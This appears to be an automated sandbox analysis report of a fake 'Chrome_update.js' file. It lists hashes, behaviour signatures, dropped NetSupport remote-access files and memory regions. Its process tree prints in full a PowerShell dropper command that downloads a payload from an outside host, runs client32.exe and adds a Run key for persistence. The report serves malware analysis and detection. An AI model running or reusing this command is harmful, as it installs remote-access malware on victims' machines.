Analysis

  • max time kernel
    1815s
  • max time network
    1834s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/12/2023, 17:33

General

  • Target

    Chrome_update.js

  • Size

    107KB

  • MD5

    bd7e4b17d2c16778b9df00cf9a5fa922

  • SHA1

    9d7f54594b0535db3e0964eff8098fe7e8318207

  • SHA256

    1351023e4077e614fe8039ea2a7fe7309cae1e8750f8cc4120f2d11d20b16ea7

  • SHA512

    4bc3e70d8aa24ecf09dd927fbbe893164ebcf48c9a646232ffe745598d639020ce499018970ed925b35422bbbc84bbfff0fb362f450a2b2da4a9138a57671fb4

  • SSDEEP

    3072:JtfeJN6SztfeJN6SztfeJN6SmtfeJN6SqtfeJN6SEtfeJN6SI:JcxzcxzcxmcxqcxEcxI

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://proximaideia.com/GetData.php?11566

exe.dropper

https://proximaideia.com/GetData.php?11566

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Chrome_update.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4360
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $nntVEtLPCDWephccqsBomzNSUjugpRU='https://proximaideia.com/GetData.php?11566';$xOpyUHtBtkutEfCnxSXymMySaCWKcdjtRyK=(New-Object System.Net.WebClient).DownloadString($nntVEtLPCDWephccqsBomzNSUjugpRU);$gbUHCEReEpZy=[System.Convert]::FromBase64String($xOpyUHtBtkutEfCnxSXymMySaCWKcdjtRyK);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $ntccpnajkXz=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $ntccpnajkXz -PathType Container)) { New-Item -Path $ntccpnajkXz -ItemType Directory };$p=Join-Path $ntccpnajkXz 'rtrs.zip';[System.IO.File]::WriteAllBytes($p,$gbUHCEReEpZy);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ntccpnajkXz)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $ntccpnajkXz 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $ntccpnajkXz -Force; $FSDFSSD.attributes='Hidden';$s=$ntccpnajkXz+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIVXX';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4544
      • C:\Users\Admin\AppData\Roaming\DIVX-839\client32.exe
        "C:\Users\Admin\AppData\Roaming\DIVX-839\client32.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:852

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rebbvtzp.oha.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\DIVX-839\HTCTL32.DLL

    Filesize

    86KB

    MD5

    b8eef74ceb05ee2cce7db4fa05a0a8b0

    SHA1

    52a15a4632e905b184df72d9d006f81bc0ee51d9

    SHA256

    c491c5b6b904741fefad44b0540967c395abaef4da63eced1f268ce10e2fd2e5

    SHA512

    d9e8241478aa82dad290ca0583fc6c4c353ca4d29f2487e5b08796159e6c897ee3c374418b48b313b959b4eeedb07662e665fc55cc91ae2e4ebe63c925910d73

  • C:\Users\Admin\AppData\Roaming\DIVX-839\HTCTL32.DLL

    Filesize

    149KB

    MD5

    6ee4479549ea6ad075bf6a39323e8ea4

    SHA1

    a006dc3e94c5a78ab28bbd35b1e7b763df46294e

    SHA256

    cbc27813a88c8a04f0a1054a6c89711b667cfae2e499a51057132ffcaabbf099

    SHA512

    2db04c5699f12714a7ed127205888de879e48313c425d71123590c19ab9490fb2fc98145b30fc832c322b1a8957975aacb52bda5f798954c70f5236fa9d5da3c

  • C:\Users\Admin\AppData\Roaming\DIVX-839\MSVCR100.dll

    Filesize

    550KB

    MD5

    d02c764af6f9ac5117de0f7ffe2e451d

    SHA1

    c67f006ec7b92af14eaaa0b2b3c0b54ceaa97393

    SHA256

    c810ac4a5097febe2b6df0f862128c8f2583aa0993ac42cbf892658b78ce3f41

    SHA512

    664b09101e18b45169dfe4e6fca6ea6eb56792aa8f822b0d6bbd8b1ff30a78adf5d50c7e240bbe3508612890dbbbc0bab1507e6b6def81e028176a54c6036dbf

  • C:\Users\Admin\AppData\Roaming\DIVX-839\NSM.LIC

    Filesize

    258B

    MD5

    1b41e64c60ca9dfadeb063cd822ab089

    SHA1

    abfcd51bb120a7eae5bbd9a99624e4abe0c9139d

    SHA256

    f4e2f28169e0c88b2551b6f1d63f8ba513feb15beacc43a82f626b93d673f56d

    SHA512

    c97e0eabea62302a4cfef974ac309f3498505dd055ba74133ee2462e215b3ebc5c647e11bcbac1246b9f750b5d09240ca08a6b617a7007f2fa955f6b6dd7fee4

  • C:\Users\Admin\AppData\Roaming\DIVX-839\PCICL32.DLL

    Filesize

    645KB

    MD5

    20c1de7ddef8db3d0c6efba798719f03

    SHA1

    adc41f627fa3642b12da85b27fd721f0b2a3c4c5

    SHA256

    0a0a875a028ee205d2edbf0479ee18726d6a274590b3c17d858bb510091adfc3

    SHA512

    c3ba7601a57cebe7fffc6108d2a6facfc0ee6d2bf0b12bf319467b57bb2edce43a6a912930cdeda251684ee9d4bd4d7e1404d9ea9f182bc9687934f21270360e

  • C:\Users\Admin\AppData\Roaming\DIVX-839\PCICL32.dll

    Filesize

    1.4MB

    MD5

    f22b93c5f04f918e24f77829309167d5

    SHA1

    4ec28bb7a9777df90cdd60e26ad74fa0cfa2ea9a

    SHA256

    da9219de4b379a7068d1825d5bb4666885366808f41544523ba34f376281c27c

    SHA512

    5f077ef2232415f9feecacfbf4c5289164e9830ca421a7d580dd2d87b68c8ed49360f3d59fba4483450c8269e4919aee1bc3be408a8f5f0464e93e21aa75e10a

  • C:\Users\Admin\AppData\Roaming\DIVX-839\client32.exe

    Filesize

    101KB

    MD5

    c4f1b50e3111d29774f7525039ff7086

    SHA1

    57539c95cba0986ec8df0fcdea433e7c71b724c6

    SHA256

    18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

    SHA512

    005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

  • C:\Users\Admin\AppData\Roaming\DIVX-839\client32.ini

    Filesize

    670B

    MD5

    b11f62b15f97cf5afb117e967c223882

    SHA1

    d6cc3f4c7cad5bf28d9c44bee2362b8edc69097b

    SHA256

    13fe71354608a9345d9d7c1600568ec911d718ece989442a39a5601e5fe35586

    SHA512

    85dbba7dcb1aa1015c186567b06ca2ae5a782a21b0b4008496fb831b39f27e5ee79c716e46aa07a9392fd3037aa1e7b4dbb47f217b1f0eb1c7fc9516d775cc7a

  • C:\Users\Admin\AppData\Roaming\DIVX-839\msvcr100.dll

    Filesize

    445KB

    MD5

    5e60851ff606877ded7978ed3d67d1bb

    SHA1

    7d2ad11d5aef8819e23f8f22dc557cce7fa5a048

    SHA256

    8611970e2935c8645859401dc93d313cfbfb7fe0507c161db649714d45ca17bf

    SHA512

    7221bd6865363f1627f21f374943414d300538326ca45a391285061efb1414d096465bd386b1d89038373f511997ac0fcfe2918638bfc664aef4d3c72c5deb70

  • C:\Users\Admin\AppData\Roaming\DIVX-839\msvcr100.dll

    Filesize

    354KB

    MD5

    5c83138676ddac06f53b727a29babbdb

    SHA1

    37b6ba6d30a181c6d01988344d1b5721e3115c3e

    SHA256

    03294d41b92c99b4313938ab9e30b4aff79c44f6d1eb7bf13064fd01691b8de4

    SHA512

    8c8913199329a7acdcd22a0110ccad76ba99cb63705faa48aa9ca3027263e33aa8539c8c6d29c6ec5de2778e7fb2449b3ae1cf8b257439b58c4cadbba215ff4b

  • C:\Users\Admin\AppData\Roaming\DIVX-839\pcicapi.dll

    Filesize

    32KB

    MD5

    34dfb87e4200d852d1fb45dc48f93cfc

    SHA1

    35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

    SHA256

    2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

    SHA512

    f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

  • C:\Users\Admin\AppData\Roaming\DIVX-839\pcichek.dll

    Filesize

    18KB

    MD5

    104b30fef04433a2d2fd1d5f99f179fe

    SHA1

    ecb08e224a2f2772d1e53675bedc4b2c50485a41

    SHA256

    956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

    SHA512

    5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

  • memory/4544-14-0x00007FFAF99C0000-0x00007FFAFA481000-memory.dmp

    Filesize

    10.8MB

  • memory/4544-15-0x000001DEE3600000-0x000001DEE3610000-memory.dmp

    Filesize

    64KB

  • memory/4544-16-0x000001DEE3600000-0x000001DEE3610000-memory.dmp

    Filesize

    64KB

  • memory/4544-19-0x000001DEFE050000-0x000001DEFE062000-memory.dmp

    Filesize

    72KB

  • memory/4544-18-0x000001DEFE020000-0x000001DEFE02A000-memory.dmp

    Filesize

    40KB

  • memory/4544-9-0x000001DEFDD40000-0x000001DEFDD62000-memory.dmp

    Filesize

    136KB

  • memory/4544-80-0x00007FFAF99C0000-0x00007FFAFA481000-memory.dmp

    Filesize

    10.8MB

  • memory/4544-12-0x000001DEE3600000-0x000001DEE3610000-memory.dmp

    Filesize

    64KB

  • memory/4544-13-0x000001DEE3600000-0x000001DEE3610000-memory.dmp

    Filesize

    64KB

  • memory/4544-11-0x000001DEE3600000-0x000001DEE3610000-memory.dmp

    Filesize

    64KB

  • memory/4544-10-0x00007FFAF99C0000-0x00007FFAFA481000-memory.dmp

    Filesize

    10.8MB